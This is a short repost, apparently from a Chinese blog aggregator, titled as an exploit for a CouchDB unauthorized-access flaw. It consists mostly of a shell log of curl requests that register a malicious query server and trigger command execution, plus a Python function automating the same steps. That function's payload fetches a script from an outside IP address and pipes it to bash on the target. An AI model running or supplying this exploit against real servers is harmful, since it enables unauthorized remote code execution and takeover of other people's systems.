CouchDB未授权访问漏洞执行任意系统命令exp
生活随笔
收集整理的這篇文章主要介紹了
CouchDB未授权访问漏洞执行任意系统命令exp
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/_config/query_servers/cmd' -d '"/sbin/ifconfig>/tmp/6666"'
""
root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest'
{"ok":true}
root@ac0e5efdb6a3:~# curl -X PUT 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
{"ok":true,"id":"vul","rev":"1-967a00dff5e02add41819138abb3284d"}
root@ac0e5efdb6a3:~# curl -X POST 'http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
{"error":"EXIT","reason":"{{badmatch,{error,{bad_return_value,{os_process_error,{exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n [{file,\"couch_query_servers.erl\"},{line,477}]},\n {couch_query_servers,lang_proc,3,\n [{file,\"couch_query_servers.erl\"},{line,462}]},\n {couch_query_servers,handle_call,3,\n [{file,\"couch_query_servers.erl\"},{line,334}]},\n {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,585}]},\n {proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,239}]}]}"}
root@ac0e5efdb6a3:~#
PY:
def CouchDb(url):
print url
cmd = 'curl -X PUT \'' +url +'/_config/query_servers/cmd\''+ ' -d ' + '\'"/usr/bin/curl http://192.184.40.86:6554/1.sh|bash>/tmp/6666"\''
cmd1 = 'curl -X PUT \'' +url +'/vultest\''
cmd2 = 'curl -X PUT \'' +url +'/vultest/vul\'' +' -d ' + '\'{"_id":"770895a97726d5ca6d70a22173005c7b"}\''
cmd3 = 'curl -X POST \'' +url +'/vultest/_temp_view?limit=11\'' + ' -d '+ '\'{"language":"cmd","map":""}\''+ ' -H ' '\'Content-Type: application/json\''
#print cmd3
step1 = os.system(cmd)
step2 = os.system(cmd1)
step3 = os.system(cmd2)
setp4 = os.system(cmd3)
pass
參考:
http://drops.wooyun.org/papers/16030
總結(jié)
以上是生活随笔為你收集整理的CouchDB未授权访问漏洞执行任意系统命令exp的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 上海法院诉讼服务网 网上立案
- 下一篇: img 标签 点击跳出图层_你竟然不知道